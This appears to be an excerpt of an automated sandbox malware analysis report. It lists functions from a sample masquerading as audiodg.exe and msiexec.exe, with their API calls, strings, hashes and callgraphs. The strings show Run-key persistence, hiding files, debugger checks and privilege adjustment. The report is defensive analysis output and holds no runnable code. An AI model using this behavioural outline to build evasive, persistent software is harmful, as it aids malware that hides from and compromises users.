                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7A91B3AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                                          • Instruction ID: fe7523f13ca97f2396291b87fea2420b614032b5b89e7fc21b05f00268e5a10a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4018861B1A58252DB61FF24F4543AA93B1FB94744FD14031D24DC39B8EE2CD22ACB10
                                                                                                                                                                                                                          Function 00007FF7A91B3B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: b96499bde182ee6d766777e11fa6cce4be4b2b8092ec3c359337848eaa700773
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93012936619A808ADB51AF14F44471AB7B4F7887A4F801225EB8D83F78DF7CC155CB10
                                                                                                                                                                                                                          Function 00007FF7A91B4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: 90c57c7e59dd50902081632c618d515956165548fa47239b9bce09401bb7b93d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511EC71A0DA8681E771AF25F4883BAA3B1FB84754F814235D69D82AF8DF3DD514CB10
                                                                                                                                                                                                                          Function 00007FF7A91B3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: a093925ed4b99e58a19b1d6d08544e5e862c317f23e236af5e32b69c2051a22c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31072661D6C186DB31EF64F4983AAB3B1FB84700F900126E68DC3A68EF3DC519CB10
                                                                                                                                                                                                                          Function 00007FF7A91B39B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: 8d2fc9674485078fbd4ebea5737b2aa6986aeae1e4b3022979fc7a64cac25062
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1115132529A4086D7919F24F44462AB7A1FB847A0F515330F9AE83BF8DF6CD055CB10
                                                                                                                                                                                                                          Function 00007FF7A91B2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B46E4: CreateFileW.KERNEL32 ref: 00007FF7A91B472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7A91B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7A91B415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A91B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A91B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: OpenProcess.KERNEL32 ref: 00007FF7A91B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7A91B40E4: CloseHandle.KERNEL32 ref: 00007FF7A91B4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7A91B3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7A91B304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: efc31e84b9e099eb75460d5479ab779079383af964e5f92e2f5bd2283e38feec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11C520A1AA8685E722FF14F8443A9A7F2FB84744FC24135D54CD6AB5DF3CA4698B60

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF775AEA2D0 1 Function_00007FF775AE33CC 67 Function_00007FF775AE2048 1->67 2 Function_00007FF775AEC9CB 3 Function_00007FF775AE1FC8 4 Function_00007FF775AE38C4 68 Function_00007FF775AE3744 4->68 5 Function_00007FF775AE40C4 34 Function_00007FF775AE4004 5->34 6 Function_00007FF775AE45C4 69 Function_00007FF775AE4544 6->69 7 Function_00007FF775AED0C4 8 Function_00007FF775AEDEC1 9 Function_00007FF775AEDCC2 10 Function_00007FF775AEEBBE 11 Function_00007FF775AE2CB8 82 Function_00007FF775AE2A88 11->82 12 Function_00007FF775AED8B8 13 Function_00007FF775AE39B4 14 Function_00007FF775AE44B4 33 Function_00007FF775AE4404 14->33 15 Function_00007FF775AE33AC 15->67 16 Function_00007FF775AEBEAD 17 Function_00007FF775AE43A4 18 Function_00007FF775AE10A0 37 Function_00007FF775AE1000 18->37 64 Function_00007FF775AE1050 18->64 19 Function_00007FF775AE2F9C 19->4 19->5 53 Function_00007FF775AE46E4 19->53 55 Function_00007FF775AE40E4 19->55 101 Function_00007FF775AE3C64 19->101 20 Function_00007FF775AEE99B 21 Function_00007FF775AE359D 22 Function_00007FF775AEE999 23 Function_00007FF775AEE997 24 Function_00007FF775AE3F14 25 Function_00007FF775AE3714 26 Function_00007FF775AED615 27 Function_00007FF775AED915 28 Function_00007FF775AE2F0C 29 Function_00007FF775AE2008 30 Function_00007FF775AEE008 31 Function_00007FF775AEB508 32 Function_00007FF775AE3609 61 Function_00007FF775AE3B54 33->61 35 Function_00007FF775AED904 36 Function_00007FF775AEC501 38 Function_00007FF775AE36FC 39 Function_00007FF775AEABFB 40 Function_00007FF775AEC2F9 41 Function_00007FF775AEABF9 42 Function_00007FF775AEABF7 43 Function_00007FF775AEC2F7 44 Function_00007FF775AEC2F5 45 Function_00007FF775AEE8F3 46 Function_00007FF775AEB2F4 47 Function_00007FF775AEBCF1 48 Function_00007FF775AEABF2 49 Function_00007FF775AE33EC 50 Function_00007FF775AE32EC 50->4 50->5 50->53 50->55 50->101 51 Function_00007FF775AE31EC 99 Function_00007FF775AE306C 51->99 52 Function_00007FF775AE36EC 93 Function_00007FF775AE4674 53->93 54 Function_00007FF775AE3CE4 55->11 56 Function_00007FF775AE1CDC 57 Function_00007FF775AE30DC 57->6 57->13 75 Function_00007FF775AE3C24 57->75 76 Function_00007FF775AE3E24 57->76 85 Function_00007FF775AE3B84 57->85 58 Function_00007FF775AEA0DD 59 Function_00007FF775AEB3DA 60 Function_00007FF775AEEFD8 62 Function_00007FF775AEDC55 63 Function_00007FF775AECD54 65 Function_00007FF775AEA052 66 Function_00007FF775AEA04E 67->3 67->29 83 Function_00007FF775AE1F88 67->83 68->25 70 Function_00007FF775AEDC46 71 Function_00007FF775AED33F 72 Function_00007FF775AED339 73 Function_00007FF775AEF232 74 Function_00007FF775AE3B24 77 Function_00007FF775AE321C 78 Function_00007FF775AED91D 79 Function_00007FF775AEC91A 80 Function_00007FF775AEEF92 81 Function_00007FF775AE338C 81->67 89 Function_00007FF775AE2978 82->89 84 Function_00007FF775AEA188 86 Function_00007FF775AEF281 87 Function_00007FF775AEA27F 88 Function_00007FF775AE327C 88->4 88->14 90 Function_00007FF775AEA778 91 Function_00007FF775AEF278 92 Function_00007FF775AE3A74 92->4 92->13 92->68 94 Function_00007FF775AEA776 95 Function_00007FF775AEC673 96 Function_00007FF775AEA772 97 Function_00007FF775AEDE70 98 Function_00007FF775AE2E6C 99->98 100 Function_00007FF775AE4264 100->61 100->74 102 Function_00007FF775AECF65 103 Function_00007FF775AED365 104 Function_00007FF775AEA061 105 Function_00007FF775AED361 106 Function_00007FF775AEB15F 107 Function_00007FF775AE345C 107->17 107->18 107->24 107->49 107->50 107->54 107->77 107->88 107->92 107->100 108 Function_00007FF775AEC65C 109 Function_00007FF775AEDE59 110 Function_00007FF775AEA05A 111 Function_00007FF775AEA258

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF775AE345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff775ae345c-7ff775ae3472 call 7ff775ae10a0 call 7ff775ae321c 236 7ff775ae3474-7ff775ae3476 ExitProcess 231->236 237 7ff775ae347c-7ff775ae34aa call 7ff775ae4264 call 7ff775ae3ce4 call 7ff775ae3f14 231->237 244 7ff775ae34ac-7ff775ae34bd call 7ff775ae43a4 237->244 245 7ff775ae34fb-7ff775ae350e call 7ff775ae3f14 237->245 252 7ff775ae34bf-7ff775ae34d0 call 7ff775ae43a4 244->252 253 7ff775ae34d2-7ff775ae34d4 ExitProcess 244->253 250 7ff775ae3510-7ff775ae3521 call 7ff775ae43a4 245->250 251 7ff775ae354c-7ff775ae355f call 7ff775ae3f14 245->251 262 7ff775ae3523-7ff775ae3525 ExitProcess 250->262 263 7ff775ae352b call 7ff775ae327c 250->263 260 7ff775ae35a2-7ff775ae35b8 call 7ff775ae3a74 call 7ff775ae33ec 251->260 261 7ff775ae3561-7ff775ae3572 call 7ff775ae43a4 251->261 252->253 264 7ff775ae34da call 7ff775ae32ec 252->264 283 7ff775ae360e-7ff775ae36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 260->283 284 7ff775ae35ba-7ff775ae35cb call 7ff775ae43a4 260->284 275 7ff775ae3574-7ff775ae3576 ExitProcess 261->275 276 7ff775ae357c call 7ff775ae327c 261->276 270 7ff775ae3530-7ff775ae3535 263->270 272 7ff775ae34df-7ff775ae34e4 264->272 277 7ff775ae3544-7ff775ae3546 ExitProcess 270->277 278 7ff775ae3537-7ff775ae3542 Sleep 270->278 273 7ff775ae34f3-7ff775ae34f5 ExitProcess 272->273 274 7ff775ae34e6-7ff775ae34f1 Sleep 272->274 274->272 282 7ff775ae3581-7ff775ae3586 276->282 278->270 286 7ff775ae3595-7ff775ae3597 ExitProcess 282->286 287 7ff775ae3588-7ff775ae3593 Sleep 282->287 289 7ff775ae35e0-7ff775ae35e2 ExitProcess 284->289 290 7ff775ae35cd-7ff775ae35de call 7ff775ae43a4 284->290 287->282 290->289 293 7ff775ae35e8 call 7ff775ae32ec 290->293 295 7ff775ae35ed-7ff775ae35f2 293->295 296 7ff775ae35f4-7ff775ae35ff Sleep 295->296 297 7ff775ae3601-7ff775ae3603 ExitProcess 295->297 296->295
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                                          • Instruction ID: e3c387f52a809feb3a1b1f2e06e0308ef8f6beb0458a909631aa4473b3dc2e82
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7611E22E3868791FB64B731A857E79AAA0BF84F01FC20536D54E865E1CE3DF8458630
                                                                                                                                                                                                                          Function 00007FF775AE4264 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: c3f2313e7d5913dcea86ca0b22c611243dbc1afbf90629e8a265e2019f80e478
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31F532A38A8286D750EB15E451B2EFBA4FBC4B80F515135FA8E47B68DF7CD4418B10
                                                                                                                                                                                                                          Function 00007FF775AE321C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: a5148cca751d433061ade0b8329f4d1ecd290610e52eac05c6c62079e5a2c87c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07F03A22D3C28681EA706B6AA40676AAB90AFA5F08F810176D9CD06594CF2CE509DA21
                                                                                                                                                                                                                          Function 00007FF775AE43A4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
